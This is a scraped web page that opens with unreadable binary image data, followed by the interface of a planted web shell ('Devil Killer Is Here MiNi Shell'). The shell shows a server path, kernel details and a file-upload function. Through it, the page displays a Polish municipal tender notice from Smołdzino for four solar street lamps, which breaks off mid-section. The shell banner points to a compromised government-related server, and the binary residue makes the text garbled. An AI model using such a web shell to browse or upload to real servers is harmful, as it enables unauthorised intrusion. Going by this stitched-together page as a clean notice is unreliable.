JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220719/0026550001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup i montaż lamp solarnych na terenie gminy Smołdzinie w ramach funduszu sołeckiego w 2022 roku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Smołdzino</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Smołdzino</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000551763</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tadeusza Kościuszki 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Smołdzino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-214</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598117215</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@smoldzino.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.smoldzino.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup i montaż lamp solarnych na terenie gminy Smołdzinie w ramach funduszu sołeckiego w 2022 roku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-091dad4e-073e-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00265500</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00205747/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup i montaż lamp solarnych na terenie gminy Smołdzino w ramach funduszu sołeckiego w 2022 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.smoldzino.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">c) Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji.<br/>d) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortalu<br/>dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP) https://www.gov.pl/web/gov/warunki-korzystania. Wykonawca zobowiązany jest zapoznać się z ww.<br/>Instrukcją i postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając<br/>ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w Instrukcji użytkownika i SWZ.<br/>e) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty<br/>oraz do komunikacji wynosi 150 MB.<br/>f) Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na ePUAP.<br/>g) Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny jest na Liście wszystkich postępowań na<br/>miniPortalu.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenie Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z 27 kwietnia 2016 r., zwanego dalej ,,rozporządzeniem 2016/679” informuję, iż:<br/>1.administratorem Pani/Pana danych osobowych jest Wójt Gminy Smołdzino mający swoją siedzibę: 76-214 Smołdzino, ul<br/>Kościuszki 3, tel: 59 8117215 ;<br/>2.dane kontaktowe inspektora ochrony danych (IOD): Roman Borowski, e-mail: roan@pro.onet.pl, albo:<br/>sekretariat@smoldzino.com.pl;<br/>3.Pani/Pana dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>ZP1.III.271.5.2022 prowadzonym w trybie podstawowym art.275 pkt. 1 Podstawą prawną przetwarzania danych jest: prawo<br/>zamówień publicznych (zwane dalej: Pzp) (Dz. U. z 2017 r. poz. 1579 i 2018) oraz art. 6 ust. 1 lit. c rozporządzenia 2016/679;<br/>4.odbiorcy danych – dane osobowe nie będą udostępniane poza osobami lub podmiotami, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy<br/>z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), oraz podmiotom, z którymi<br/>Administrator ma podpisane umowy powierzenia np. obsługa informatyczna<br/>i prawna. Dane nie będą udostępniane do państw trzecich;<br/>5.Pani/Pana dane osobowe będą przechowywane zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;<br/>6.ma Pani/Pan prawo dostępu do danych, ich sprostowania, ograniczenia przetwarzania na podstawie art 18 rozporządzenia<br/>2016/679 z zastrzeżeniem przypadków, o których mowa w art. 18 ust.2 rozporządzenia 2016/679. Powyższe prawa można<br/>zrealizować poprzez wniosek złożony do Urzędu Gminy. Wniosek można złożyć w formie tradycyjnej bądź za pomocą komunikacji<br/>elektronicznej po uprzednim potwierdzeniu tożsamości wnioskodawcy - art. 12 ust. 2 oraz 3 rozporządzenia 2016/679;<br/>7.ma Pani/Pan prawo wniesienia skargi do UODO (Biuro Prezesa Urzędu Ochrony Danych Osobowych (PUODO) Adres: Stawki 2,<br/>00-193 Warszawa tel: 22 8607086) gdy uzna Pan/Pani, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy rozporządzenia 2016/679.<br/>8.Nie przysługuje Pani/Panu prawo do:<br/>1.usunięcia danych (art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679) ;<br/>2.przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;<br/>3.sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art.<br/>Ogłoszenie nr 2022/BZP 00248986/01 z dnia 2022-07-11<br/>2022-07-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>6 ust. 1 lit. c rozporządzenia 2016/679;<br/>9.obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>10.Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany, a podejmowane decyzje nie będą oparte o profilowanie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP1.III.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 22809,38 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac polegających na dostawie i montażu 4 lamp solarnych w miejscowościach<br/>położonych na terenie Gminy Smołdzino w sołectwach Komnino i Witkowo - dokładna lokalizacja będzie wskazana po<br/>podpisaniu umowy z Wykonawcą.<br/>Zakres robót stanowiący przedmiot zamówienia oraz specyfikacja lamp wraz z osprzętem:<br/>1. dostawa i montaż na miejscu instalacji słupa ocynkowanego na fundamencie prefabrykowanym o wysokości od 4 do 5 m;<br/>2. montaż wysięgnika rurowego oraz ogniwa, bądź ogniw fotowoltaicznych, podwójnej oprawy LED, jak również<br/>niezbędnego oprzyrządowania [akumulatorów żelowych; okablowania, sterowników, itp.];<br/>3. programowanie sterownika lampy LED oraz testowanie lampy;<br/>4. komplet lamp solarnych stanowią wszystkie niezbędne urządzenia, które pozwolą na zamontowanie lamp we wskazanych<br/>przez Zamawiającego lokalizacjach o następujących parametrach:<br/>a) - wysokość słupa od 4 do 5m,<br/>b) - rodzaj słupa: stal ocynkowana, o grubości ścianki min 4 mm - słup zbieżny ku wierzchołkowi,<br/>c) - źródło światła: oprawa LED o mocy min. 30 W,<br/>d) - dopuszcza się lampy podwójne, każda na oddzielnym wysięgniku, o mocy min. 15W każda,<br/>e) - barwa światła: w zakresie 4000 – 6000 K,<br/>f) - czas pracy lampy: min 8 h,<br/>g) - czas autonomii: od 4 do 5 dni,<br/>h) - moc paneli: min 250W,<br/>i) - typ akumulatora: żelowy,<br/>j) - pojemność akumulatora: min. 120 Ah,<br/>k) - sposób włączania: czujnik zmierzchu,<br/>l) - rodzaj fundamentu: kotwiący, prefabrykat betonowy.<br/>5. Wykonawca zobowiązany jest w ofercie uwzględnić wszystkie materiały oraz konieczne do wykonania prace mające na<br/>celu wykonanie zamówienia, a zatem zakup, dostarczenie oraz zamontowanie lamp w lokalizacji wskazanej przez<br/>Zamawiającego – teren Gminy Smołdzino – sołectwo Komnino i Witkowo zgodnie z obowiązującymi przepisami.<br/>6. Wszystkie lampy powinny spełniać niezbędne normy, być dopuszczone do użytkowania oraz posiadać karty techniczne i<br/>gwarancyjne. Wykonawca dołączy do oferty deklaracje zgodności UE (atesty, certyfikaty, aprobaty techniczne, specyfikacje<br/>techniczne, itp.) i deklaracje właściwości użytkowych produktów oferowanych do wykonywania zamówienia.<br/>7. Prace mają być wykonane zgodnie z normami, w tym sztuką budowlaną, wedle powszechnie obowiązujących<br/>standardów, a materiały powinny być dopuszczone do obrotu i powszechnie stosowane w tego rodzaju pracach.<br/>8. Przy realizacji zamówienia wykonawca może zastosować materiały lub urządzenia dowolnego producenta pod<br/>warunkiem, że materiały te i urządzenia posiadają parametry nie gorsze od opisanych w dokumentacji przetargowej.<br/>10. Zamawiający wymaga:<br/>1) udzielenia przez Wykonawcę gwarancji i rękojmi na dostarczone i zamontowane lampy - minimum 36 miesięcy, licząc od<br/>dnia końcowego odbioru przedmiotu zamówienia. Termin gwarancji i rękojmi na dostarczone i zamontowane lampy, jakiej<br/>Wykonawca udziela Zamawiającemu, stanowi jedno z kryteriów oceny ofert, które będzie oceniane zgodnie z punktem<br/>XVIII.2) lit. b) SWZ.<br/>2) Usunięcia awarii od momentu jej zgłoszenia w max czasie – 60 godzin pod sankcją kary umownej.<br/>11. Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust.3 pkt. 32 ustawy o odpadach ma obowiązek<br/>zagospodarowania (wywozu i utylizacji) na własny koszt odpadów powstałych podczas realizacji zadania, zgodnie z<br/>obowiązującymi przepisami<br/>12. Zaleca się by Wykonawca zapoznał się z terenem budowy.<br/>4.2.6.) Główny kod CPV: 31520000-7 - Lampy i oprawy oświetleniowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31520000-7 - Lampy i oprawy oświetleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Oceny ofert będzie dokonywała komisja przetargowa.<br/>2) W odniesieniu do Wykonawców, którzy spełnili postawione warunki komisja dokona oceny ofert na podstawie następującego<br/>kryterium:<br/>- Cena - 60 %,<br/>-Gwarancja i rękojmia na wykonany przedmiotu zamówienia - 20%<br/>-Usunięcie awarii od momentu zgłoszenia – 20 %<br/>a)Kryterium „cena” (C) będzie liczona wg wzoru:<br/>Zamawiający przy obliczaniu tego kryterium będzie brał pod uwagę cenę za wykonanie przedmiotu zamówienia. Oferta z ceną<br/>najniższą otrzyma 60 pkt. i zostanie przyjęta jako podstawa do badania pozostałych ofert. Punktacja za ceny kolejnych ofert<br/>odbędzie się wg wzoru:<br/>Najniższa cena oferty<br/>C = ------------------------------ x 60,0<br/>Cena badanej oferty<br/>b)kryterium „gwarancja” (G), ilość punktów - max 20 pkt.:<br/>Zamawiający przy obliczaniu tego kryterium będzie brał pod uwagę okres gwarancji i rękojmi udzielony na cały zrealizowany<br/>przedmiot zamówienia (w tym na zamontowane urządzenia). Wykonawca otrzyma punkty w wysokości:<br/>• 36 m-cy – 0 pkt.<br/>• 48 m-cy – 10 pkt.<br/>• 60 m-cy – 20 pkt.<br/>Uwaga:<br/>Wykonawca zobowiązany jest w druku ofertowym dokonać przez podkreślenie oferowanej ilości gwarancji i rękojmi. W przypadku<br/>gdy wykonawca nie wybierze żadnej opcji, to Zamawiający odrzuci ofertę.<br/>Kryterium „usunięcie awarii od momentu zgłoszenia” (U), ilość punktów - max 20 pkt.:<br/>Zamawiający przy obliczaniu tego kryterium będzie brał pod uwagę czas usunięcia awarii od momentu zgłoszenia. Wykonawca<br/>otrzyma punkty w wysokości:<br/>• 96 godz. – 0 pkt<br/>• 48 godz. – 10 pkt<br/>• 24 godz. – 20 pkt.<br/>Uwaga:<br/>Wykonawca zobowiązany jest w druku ofertowym dokonać przez podkreślenie oferowanego czasu na usunięcie awarii. W przypadku<br/>gdy wykonawca nie wybierze żadnej opcji, to Zamawiający odrzuci ofertę. Łączna ilość punktów uzyskanych przez wykonawców:<br/>P = C + G + U<br/>gdzie:<br/>P – łączna ilość punktów uzyskanych przez wykonawcę<br/>C – ilość punktów uzyskanych w kryterium „cena”<br/>G – ilość punktów uzyskanych w kryterium gwarancja i rękojmia na wykonany przedmiot zamówienia<br/>„gwarancja”<br/>U – ilość punktów uzyskanych w kryterium „usunięcie awarii od momentu zgłoszenia”<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu<br/>i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze.<br/>4) Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną lub<br/>najniższym kosztem.<br/>5) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 2, zamawiający wzywa wykonawców, którzy złożyli te<br/>oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających<br/>nową cenę lub koszt.<br/>6) Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen lub kosztów wyższych niż zaoferowane w uprzednio złożonych<br/>przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">usunięcie awarii od momentu zgłoszenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>3.sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>4.zdolności technicznej lub zawodowej:<br/>W ramach tego warunku wykonawca zobowiązany jest do:<br/>wykazania, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności<br/>jest krótszy w tym okresie) wykonał (a w przypadku świadczeń o charakterze okresowym lub ciągłym –wykonuje) należycie:<br/>minimum jedno zamówienie obejmującego zakup (dostawę) i montaż lamp solarnych w ilości 4 minimum szt.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>a) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane do realizacji których te zdolności są wymagane.<br/>b) W przypadku, o którym mowa w pkt. a), wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi lub dostawy lub roboty budowlane wykonają poszczególni wykonawcy.<br/>c) warunek opisany w pkt. 4.1 zostanie spełniony, jeżeli jeden z wykonawców będzie posiadał wymagane doświadczenie lub<br/>będą spełniać łącznie<br/>d) warunek opisany w pkt. 4.2 zostanie spełniony, jeżeli jeden z wykonawców będzie dysponował wymaganymi osobami lub<br/>Wykonawcy będą wspólnie dysponowali tymi osobami.<br/>e) Wykonawcy, o których mowa w pkt. 5, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie<br/>zabezpieczenia należytego wykonania umowy.<br/>f) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, których oferta wspólna zostanie najwyżej<br/>oceniona, są oni zobowiązani na wezwanie Zamawiającego złożyć podmiotowe środki dowodowe, o których mowa w<br/>Rozdziale XI. pkt. 2 SWZ potwierdzające brak podstaw wykluczenia, przy czym w zakresie który/którzy wykazuje/-ą<br/>spełnienie warunku udziału. <h3 class="mb-0">5.5.) 